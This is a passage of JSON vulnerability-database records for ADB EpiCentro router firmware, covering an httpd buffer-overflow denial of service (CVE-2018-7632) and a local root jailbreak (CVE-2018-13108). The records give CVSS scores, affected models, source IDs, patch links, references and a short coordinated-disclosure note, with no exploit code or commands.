"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7632",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7632",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-20660",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-488",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to cause a denial of service attack remotely via a specially crafted GET request with a leading \"/\" in the URL. Epicentro Contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. \n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7632",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20660",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"id": "VAR-201810-1457",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
}
]
},
"last_update_date": "2023-12-18T13:23:55.689000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:01.907000",
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"date": "2018-12-10T17:23:37.780000",
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Epicentro Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
],
"trust": 0.6
}
}
VAR-201807-1045
Vulnerability from variot - Updated: 2023-12-18 12:18All ADB broadband gateways / routers based on the Epicentro platform are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device, and extract further information such as sensitive configuration data of the ISP (e.g., VoIP credentials) or attack the internal network of the ISP. plural ADB Broadband gateways and routers contain access control vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1045",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13108"
}
]
},
"cve": "CVE-2018-13108",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-13108",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-12784",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-123134",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-13108",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13108",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-12784",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-444",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123134",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-13108",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device, and extract further information such as sensitive configuration data of the ISP (e.g., VoIP credentials) or attack the internal network of the ISP. plural ADB Broadband gateways and routers contain access control vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123134",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44983",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13108",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "148424",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "44983",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-12784",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-123134",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-13108",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"id": "VAR-201807-1045",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
}
]
},
"last_update_date": "2023-12-18T12:18:41.356000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "ADBBroadbandGateways/Routers patch for local root jailbreak vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133899"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81865"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/148424/adb-local-root-jailbreak.html"
},
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/44983/"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2018/jul/17"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/archive/1/542117/100/0/threaded"
},
{
"trust": 1.8,
"url": "https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13108"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13108"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources": {
"@context": {
